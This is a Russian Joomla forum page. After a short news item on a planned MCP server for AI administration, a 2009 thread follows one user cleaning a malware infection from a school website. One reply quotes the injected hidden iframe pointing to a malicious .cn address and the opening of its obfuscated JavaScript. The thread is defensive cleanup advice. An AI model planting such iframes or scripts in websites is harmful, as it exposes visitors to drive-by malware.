Новости Joomla

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

В февральском номере Joomla Community Magazine в статье Evolving Joomla - Joomla CMS MCP Server: Opening the Door to AI-Powered Administration рассказывается о работе команды разработчиков над внедрением в ядро Joomla MCP-сервера.

Что такое MCP-сервер?
Последние годы всех захватывает бум ИИ-технологий. Появились ИИ-агенты - программы, устанавливаемые на сервер или компьютер, которые получают от вас запрос или задачу в человеческом виде и могут выполнять действия с файлами, ходить по сайтам, создавать сайты, программировать и т.д. Люди используют ИИ-агентов в самых разных ситуациях: от написания и проверки кода (даже там, где язык программирования не знаете совсем) до планирования путешествий и бронирования гостиницы.

ИИ-агенты могут использовать различные программные инструменты по протоколу Model Context Protocol (MCP). Для этого разработчик программы должен внедрить MCP в свой продукт или сервис. Так, например, ваш ИИ-агент может ходить по сайтам через браузер и собирать нужную информацию, управляя браузером через MCP-сервер. Или использовать функционал IDE PHP Storm для написания кода, сбора и отладки ошибок, использовать поиск PHP Storm по кодовой базе, а не простой текстовый поиск по файлам. MCP предоставляет набор функций для полноценного управления программным обеспечением.

В случае с Joomla, сервер MCP может предоставить администраторам следующие возможности:
- Автоматическое создание категорий, материалов и меню на основе карты сайта или PDF-файла.
- Создавайть SEO-оптимизированные заголовки и метаописания в пакетном режиме.
- Обновлять расширения на нескольких сайтах одновременно
- Создание посадочные страницы.

Важно отметить, что сервер MCP не задумывался как функция, доступная только «супер-администраторам». Цель инициативы — создать решение, которое будет простым в настройке, маломощным и доступным для широкого круга пользователей.

В процессе разработки точка входа Joomla (аналогично Site, Administrator, Api, Cli), которая будет работать с Streamable HTTP, необходимым для MCP. Аутентификация пока что предполагается на токенах, но затем планируется создание универсального OAuth-сервера для Joomla.
Фактические возможности MCP — инструменты, ресурсы и подсказки — реализованы в виде плагинов для обеспечения расширяемости. Таким образом ожидаем, что и сторонние разработчики смогут создавать MCP-плагины для внедрения поддержки своих расширений Joomla для работы с ИИ.

@joomlafeed

Вышли релизы безопасности Joomla 6.0.4 и Joomla 5.4.4

Релиз безопасности Joomla 6.0.4 и Joomla 5.4.4

Проект Joomla! рад сообщить о выходе Joomla 6.0.4 и Joomla 5.4.4. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

0 Пользователей и 1 Гость просматривают эту тему.
  • 14 Ответов
  • 4425 Просмотров
*

Терпеливый

  • Осваиваюсь на форуме
  • 17
  • 0 / 0
В общем, дело обстоит так: при заходе на сайт с компьютера на котором установлен антивирус Касперского появляется сообщение "Этот сайт опасен бла бла бла и вваливается ссылка, что происходит перенаправление на страничку http://phrhrhrhereo.cn/ex/index.php Но перенаправления на происходит! Троян пока себя вообще никак на проявляет! Проверял разныим онлайновыми проверялками (прошу прощения за каламбур:)): http://www.burbon.ru/sites/virus.php - стабильно находит, www.webscanner.ru - Сайт содержит подозрительный (скрытый) IFRAME Это не означает, что сайт обязательно опасен. Однако, вызывает подозрения, http://online.us.drweb.com  - ничего не находит.  Вебмастер яндекса говорит, что "Сайт может угрожать безопасности вашего компьютера" вредоносный код находится на всех страницах сайта.

С моего компьютера при заходе на сайт ничего не обнаруживается, но это, наверное, из-за отстойного антивируса:)
Сохранил копию сайта на комп, поглядел index.php, но IFRAMEов на нашел. Проконсультируйте как отловить гада.
P.S.: Вот наш сайт - http://mordovoobraz.68edu.ru
Загляните, если можете, напишите у кого что видно.
P.P.S.: Joomla 1.5.9.
Администрирую с работы, через 10-ю оперу, на фтп заливаю через FileZilla'у, Win XP со всеми заплатками, антивирус - AVG 8.0 Antivirus Free (на платный антивирус у начальства жалко денег).
Еще раз извиняюсь, но до четверга не смогу отвечать на вопросы, если у кого будут - выходной, однако:).
« Последнее редактирование: 03.11.2009, 11:49:55 от Терпеливый »
*

one_more

  • Захожу иногда
  • 139
  • 87 / 3
  • there is no spoon
поглядел index.php, но IFRAMEов на нашел. Проконсультируйте как отловить гада.
P.S.: Вот наш сайт - http://mordovoobraz.68edu.ru
Загляните, если можете, напишите у кого что видно.
Видно следующее:
1. Вирус есть, можете не сомневаться.
2. iframe вставлен, можете быть уверены. Проверять нужно не только корневой index.php, но и все индексные файлы во всех директориях (причём не только index.php но и index.html). Начать можно с шаблона. Торчит он где-то в самом начале страницы внутри <div id="ja-search"> вместе с вирусным js
3. Рекомендуется почитать здесь.
Errare humanum est
*

Терпеливый

  • Осваиваюсь на форуме
  • 17
  • 0 / 0
Проглядел index.html файлы шаблонов - действительно нашел строки с вредоносным кодом. Заменил все файлы на "чистые" из оригинального дистрибутива. Зашел на webscanner.ru, проверил сайт - по прежнему есть сообщение, что "Сайт содержит подозрительный (скрытый) IFRAME", где еще может прятаться троян? Или проблема в том, что вебсканнер не сразу индексирует сайт?
*

one_more

  • Захожу иногда
  • 139
  • 87 / 3
  • there is no spoon
Терпеливый, файлы index.html к движку, по большому счёту, вообще никакого отношения не имеют. Они предотвращают просмотр директории при неправильно настроенном сервере, и всё. Вредителя искать нужно в файле index.php шаблона, как уже написано выше.
Errare humanum est
*

Терпеливый

  • Осваиваюсь на форуме
  • 17
  • 0 / 0
Терпеливый, файлы index.html к движку, по большому счёту, вообще никакого отношения не имеют. Они предотвращают просмотр директории при неправильно настроенном сервере, и всё. Вредителя искать нужно в файле index.php шаблона, как уже написано выше.
Отсмотрел все индексные файлы в папке шаблонов, но вирусного кода не нашел, хотя это может быть из-за слабого знания php:)
Пошел радикальным путем - поменял всю папку шаблонов на папку из дистрибутива Joomla.
Не хочу показаться навязчивым, но не может ли кто (главное чтоб у Вас был установлен хороший антивирус:)) зайти на сайт http://mordovoobraz.68edu.ru и отписаться, есть ли какие сообщения о вирусах.
P.S.: Только не считайте это рекламой и не баньте меня:).
*

one_more

  • Захожу иногда
  • 139
  • 87 / 3
  • there is no spoon
Ваш вирус в целости и сохранности, там же, где и был.

из-за слабого знания php:)
Вирус не на php, это банальнейший html-код, вставляющий iframe
Цитировать
<iframe width="1" height="1" frameborder="0" src="http://thrhrhrhereo.cn/in.cgi?2" border="0">
плюс код JavaScript
Цитировать
<script>function icZmY(iCc, iLeW, Yvpx){var zgwPFKvA=Yvpx.split(iLeW);... и т.д.
Всё это расположено в блоке <div id="ja-search"> сразу за открывающим тэгом.
« Последнее редактирование: 09.11.2009, 18:24:48 от one_more »
Errare humanum est
*

Терпеливый

  • Осваиваюсь на форуме
  • 17
  • 0 / 0
Ваш вирус в целости и сохранности, там же, где и был.
Вирус не на php, это банальнейший html-код, вставляющий iframeплюс код JavaScriptВсё это расположено в блоке <div id="ja-search"> сразу за открывающим тэгом.


Вот как раз такой код и был вписан в index.html файлы в шаблонах.
Побродив по интернету я нашел на этой странице http://www.vashmaster.ru/informaciya/o_sozdanii_saytov/news52.php
маленький скрипт по поиску iframe'ов, просканировал весь сайт и в результате нашлось более 200-т предположительно зараженных файлов.
Сейчас вручную отсматриваю файлы и вырезаю вреднючий код - везде одинаковый и встречается пока только в index.html разных плагинов и модулей.
Какая скучная работа...
P.S.: В итоге оказалось около 60 зараженных файлов - все index.html, в остальных вроде все чисто.
« Последнее редактирование: 11.11.2009, 11:38:40 от Терпеливый »
*

Терпеливый

  • Осваиваюсь на форуме
  • 17
  • 0 / 0
Все, завалил гада!
« Ответ #7 : 11.11.2009, 13:15:24 »
Наконец-то на www.burbon.ru появилось сообщение:
На странице http://mordovoobraz.68edu.ru/ вредоносный код не обнаружен!
Оказалось, что троян сидел еще в нескольких php файлах в компоненте поиска.
Немного изменил условие поиска - и все чисто!
*

palexa

  • Завсегдатай
  • 1108
  • 88 / 0
Ты уж не забудь  пароль на ФТП поменять и не хранить его в програме  которой пользуешся для доступа , а то опять закинут вирусяк
*

kaplan

  • Осваиваюсь на форуме
  • 39
  • 0 / 0
Ребята помогите! Нашёл вирус он во всех файлах index.html и index.html и файлах js. Этих файлов очень много я удалил код больше чем 300 файлов и потратил 3 часа. Есть другой способ или только руками?
*

beliyadm

  • Легенда
  • 9758
  • 1665 / 66
  • Севастополь, Россия
Есть другой способ или только руками?
да конечно, восстановить из резервной копии (а она обязана быть, как презерватив в бумажнике - всегда)
Все истины, которые я хочу вам изложить, — бесстыдная ложь. Сделать всё хорошо
TLG: @Beliyadm
*

kaplan

  • Осваиваюсь на форуме
  • 39
  • 0 / 0
да конечно, восстановить из резервной копии (а она обязана быть, как презерватив в бумажнике - всегда)
Не поверите  но её нет. У меня вдс там за бэкап надо или платить или вручную что-то в этом роде а я этого не сделал. Да и бэкап врятли бы помог , так как иди знай когда вирус залез.
*

haword

  • Захожу иногда
  • 124
  • 25 / 0
походу кто то ломает Joomla и впаривает туда трояны.
« Последнее редактирование: 29.01.2010, 10:55:31 от haword »
*

palexa

  • Завсегдатай
  • 1108
  • 88 / 0
да никто Joomla не ломает, просто нефиг держать пароль в ФТП клиенте. Читайте выше по топику
*

haword

  • Захожу иногда
  • 124
  • 25 / 0
у меня стоит каспер. но всетаки надеюсь что не ломают а то как то грусно будет.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 73681
Последний ответ 30.08.2023, 12:53:33
от SeBun
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 5879
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
На сайте появился вирус

Автор Lifar

Ответов: 3
Просмотров: 1685
Последний ответ 23.04.2021, 10:12:05
от ProtectYourSite
Регистрируются боты на сайте непрерывно.

Автор Stich SPb

Ответов: 27
Просмотров: 14671
Последний ответ 22.02.2021, 17:42:48
от soty20
Всплывающее спам-сообщение+редирект на Joomla 2.5.14

Автор bonusfree

Ответов: 21
Просмотров: 2566
Последний ответ 02.12.2020, 21:56:30
от bonusfree